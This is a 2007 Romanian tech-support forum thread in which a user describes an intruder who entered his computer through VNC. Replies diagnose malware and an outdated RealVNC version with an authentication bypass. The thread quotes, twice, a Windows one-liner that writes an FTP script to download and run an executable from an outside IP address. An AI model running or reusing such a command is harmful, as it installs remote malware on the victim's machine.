Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
Incalzire in pardoseala etapizata

Suprataxa card energie?!

Cum era nivelul de trai cam din a...

probleme cu ochelarii
 Impozite pe proprietati de anul v...

teava rezistenta panou apa calda

Acces in Curte din Drum National

Sub mobila de bucatarie si sub fr...
 Rezultat RMN

Numar circuite IPAT si prindere t...

Pareri brgimportchina.ro - teapa ...

Lucruri inaintea vremurilor lor
 Discuții despre TVR Sport HD.

Cost abonament clinica privata

Tremura toata, dar nu de la ro...

Renault Android
 

In legatura Cu VNC

- - - - -
  • Please log in to reply
2 replies to this topic

#1
Black-angel

Black-angel

    New Member

  • Grup: Members
  • Posts: 4
  • Înscris: 30.11.2006
Am VNC-ul instalat si nu am dat la nimeni parola sa intre decat eu sa pot intra cand sunt pelcat de acasa,
Dar totusi a mai intrat cienva in calc meu si icnerca sa dea o comanda in run sau pe mirc nu stiu daca a apucat sa o dea cand nu sunt eu acasa .. dar comanda care a vrut sa o dea este c del i&echo open 89.36.253.161 8775 > i&echo user 1 1 >> i &echo quit >>:i &764.exe&del i&exit vreau sa stiu si eu ce face aceasta comanda .. Am formatat calculatorul am sters tot de pe el .. dar am instalat iar VNC-ul si iar a intrat am inchis VNC-ul si l-am dezinztalat si el tot a intra le mine .. ma treazeam ca mi se mijca mouse-ul pe ecran si ca vrea sa dea in run comanda de mai sus!!! va rog ajutatima Ca nu stiu ce sa fac

#2
Daisuke

Daisuke

    Moderator

  • Grup: Senior Members
  • Posts: 2,173
  • Înscris: 19.01.2004
Ai un malware pe acolo.

Scaneaza computerul aici:
Kaspersky Online Scanner: http://www.kaspersky.com/virusscanner
Copiaza logul si posteaza-l.

#3
allkatraz

allkatraz

    Member

  • Grup: Members
  • Posts: 745
  • Înscris: 05.06.2006

View PostBlack-angel, on Jan 30 2007, 22:34, said:

Am VNC-ul instalat si nu am dat la nimeni parola sa intre decat eu sa pot intra cand sunt pelcat de acasa,
Dar totusi a mai intrat cienva in calc meu si icnerca sa dea o comanda in run sau pe mirc nu stiu daca a apucat sa o dea cand nu sunt eu acasa .. dar comanda care a vrut sa o dea este c del i&echo open 89.36.253.161 8775 > i&echo user 1 1 >> i &echo quit >>:i &764.exe&del i&exit vreau sa stiu si eu ce face aceasta comanda .. Am formatat calculatorul am sters tot de pe el .. dar am instalat iar VNC-ul si iar a intrat am inchis VNC-ul si l-am dezinztalat si el tot a intra le mine .. ma treazeam ca mi se mijca mouse-ul pe ecran si ca vrea sa dea in run comanda de mai sus!!! va rog ajutatima Ca nu stiu ce sa fac

Folosesti o versiune veche de Real VNC, si anume v4.1.1, care sufera de un bug major, acela ca se poate ocoli autentificarea daca te conectezi cu un client modificat. Instaleaza ultima versiune, 4.1.2, si nu o sa mai ai probleme. Sau, la fel de posibil, folosesti o parola slaba, scurta, fara cifre. Am i wrong?

Anunturi

Bun venit pe Forumul Softpedia!

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate